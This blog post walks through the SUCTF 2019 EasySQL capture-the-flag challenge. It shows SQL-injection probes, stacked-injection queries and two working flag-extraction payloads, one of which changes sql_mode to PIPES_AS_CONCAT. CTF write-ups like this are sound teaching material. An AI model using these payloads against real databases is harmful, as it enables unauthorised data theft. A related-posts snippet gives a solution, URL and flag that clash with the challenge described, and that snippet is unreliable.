[SUCTF 2019]EasySQL

最新推荐文章于 2024-03-28 22:54:01 发布
最新推荐文章于 2024-03-28 22:54:01 发布
阅读量232 收藏 1
点赞数
分类专栏: BUUCTF_Web 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55026246/article/details/126399584
版权

[SUCTF 2019]EasySQL

【SQL注入】

方法一

打开题目,看到输入框便直接进行注入点的试探。
在这里插入图片描述

1			// 这里输入任意的数字都会得到一条回显(0除外)
0	1’		// 输入0 1' 1'#都没有回显
1"	1' or 1=1#		// 回显Nonono(看不大懂)

因为回显的不同显然应该是有注入点的,但是不论输入order by, union, select, from都回显 Nonono ,八成是被过滤了吧!(大小写,双写也都不得行)再次尝试堆叠注入。

1;show databases;
1;show tables;

在这里插入图片描述
尝试查看表结构1;desc Flag;,依旧 Nonono ,离谱,拿 flag 也过滤?!

回想所有的尝试,任意数字有数组回显,0 、任意字符、关键字不行,flag 也不行。猜测SQL语句:

select $post['query'] || flag from Flag;
# 因为
# 只有一个表Flag,那查询的必是这个表;
# 输入任意数字可以,任意数字都可以被理解为布尔 1 ,而只有 0 例外;(任意字符当然也不行了)
# 关键字不行是被过滤,且把 flag 也作为关键字过滤。
// (这里是看过wp理解的,本人脑洞还是不够大)

构造Payload:*,1,构成的SQL语句:select *,1 || flag from Flag;

得到 flag 。

在这里插入图片描述

方法二

修改 MySql 配置参数,使||作为字符串连接操作符而不是逻辑运算符执行。

Payload:1;set sql_mode=PIPES_AS_CONCAT;select 1,得到 flag 。

(可以看出最终结果将select 1select flag from Flag;的结果拼接到了一起)

在这里插入图片描述

参考
https://blog.csdn.net/weixin_42373127/article/details/88866710
https://blog.csdn.net/RABCDXB/article/details/111398725

awsszzfff
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
_PE_Format.pdf
03-26
_PE_Form_PE_Format.pdf_PE_Format.pdf_PE_Format.pdfat.pdf_PE_Format.pdf_PE_Format.pdf
BUUCTF——[SUCTF2019]EasySQL
weixin_62248541的博客
11-28 331
BUUCTF——[SUCTF2019]EasySQL
[suctf 2019]EasySQL(WP)
最新发布
wikey 的博客
03-28 339
直接查目录发现失败,推测可能更改过系统设置,我们知道flag在目录里但是不能直接打开需要更改设置后访问,这里需要扩展一下PIPES_AS_CONCAT 函数的含义,它的作用就是将两个任务重合在一起执行。当 sql_mode 没有设置 PIPES_AS_CONCAT 时 (默认没有设置),|| 就是逻辑或,相当于OR函数。sql_mode 设置了 PIPES_AS_CONCAT 时,|| 就是字符串连接符,相当于CONCAT() 函数。如果command1执行失败,则执行command2。
[SUCTF 2019]EasySQL1
bring_coco的博客
09-22 7695
目标]Sql语句的堆叠注入[环境]Buuctf[工具]浏览器[分析]1.试试sql注入正常套路(1)先试试1有回显(2)再试试字母没有回显(3)试试单引号注入提示不一样,因此猜测这里有注入点(4)试试有多少列还是不成功,因此一般的联合查询在这里不能使用(5)基于时间的盲注和报错注入都需要嵌套联合查询语句来实现,因此可以跳过,直接试试布尔型盲注还是不成功2.利用堆叠注入(1)查找所有数据库(2)查询所有表名(3)查询Flag表中的列。
[suctf 2019]EasySQL
qq_62046696的博客
06-28 1229
打开感觉是一道sql注入的题,发现输入数字 非0都会返回值 使用Sql堆叠注入查看信息,先用show指令查看数据库:1;show databases; 然后查看表名, 感觉要出来了 ,直接 1; show columns from Flag; 发现flag被过滤,唉就知道没这么简单,看到Flag表,猜测flag应该在Flag中。但是用1;show columns from Flag;无法回显出flag只会回显Nonono. -->说明flag被过滤掉了(注:1;show columns from用来查询
[SUCTF 2019]EasySQL1 题目分析与详解
2302_79800344的博客
02-24 1704
EasySQL
sql_mode详解(超详细,亲测有效)
热门推荐
lky_for_lucky的博客
11-27 4万+
写在前面:处理MySQL数据库工作中遇到关于sql_mode的情况,特学习记录一下 1.sql_mode sql_mode是一组语法校验规则 2.查询sql_mode ①命令:select @@GLOBAL.sql_mode或者select @@SESSION.sql_mode 例如:②查看my.conf配置文件 例如:3.设置sql_mode ①命令:SET GLOBAL sql_mode=‘mode’;或者SET SESSION sql_mode=‘mode’;(mode替换为实际配置)。 ②修改my.
web:[SUCTF 2019]EasySQL
sleepywin的博客
09-25 928
将”||”视为字符串的连接操作符而非或运算符,这和Oracle数据库是一样的,也和字符串的拼接函数Concat相类似.SELECT * 和 SELECT 所有列,两者差别几乎可忽略。所以查询所有字段(或者大多数字段)的时候,可以用select *来操作。|| 逻辑或的短路:a||b计算机发现a是真,那么输出a;如果a是假,那么输出bselect 1 from :建立一个临时列,这个列的所有初始值都被设为1。Mysql中的||0 || 1 = 13 || 4 = 10 || 0 = 0。
BUUCTF [SUCTF 2019]EasySQL1 writeup(详细版)
m0_62851980的博客
04-10 1万+
考点:堆叠注入,MySQL和mssql中||运算符的区别,运算符的意义转换(操作符重置) 打开靶机,尝试输入1查看回显: 可以看到表格回显了内容:1,用其他非0数字尝试全都回显1,那我们换个数字尝试,比如0: 什么都没有。 使用Sql堆叠注入查看信息,先用show指令查看数据库:1;show databases; 再查看一下表:1;show tables; 看到Flag表,猜测flag应该在Flag中。 但是直接select flag from Flag查询是查不...
suctf 2019 easysql怎么解
03-28
题目描述 easysql是一个基于MySQL的简单查询练习平台。在这里,你可以使用MySQL语言查询数据库中的数据。 题目链接:http://easysql.suctf2019.cn:8888/ 题解 进入网站后,可以看到一个登录页面,尝试使用常见的一些弱口令进行登录,发现均不可行。故考虑其他方式进入系统。 点击右上角的注册按钮,可以看到注册页面。试图使用SQL注入进行注册,发现不可行。 再次尝试登录,发现登录请求中带有username和password两个参数。考虑使用SQL注入进行登录。 在username参数中输入 ' or 1=1#,发现能够成功登录。进入系统后,可以看到一个名为flag的数据库。 不难猜测,flag就在这个数据库中。使用SQL语句查询flag数据库中的所有表。 SELECT table_name FROM information_schema.tables WHERE table_schema='flag'; 然后再查询每个表中的数据。 SELECT * FROM flag.table_name; 得到flag。 flag{easysql_is_so_eassssy}

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值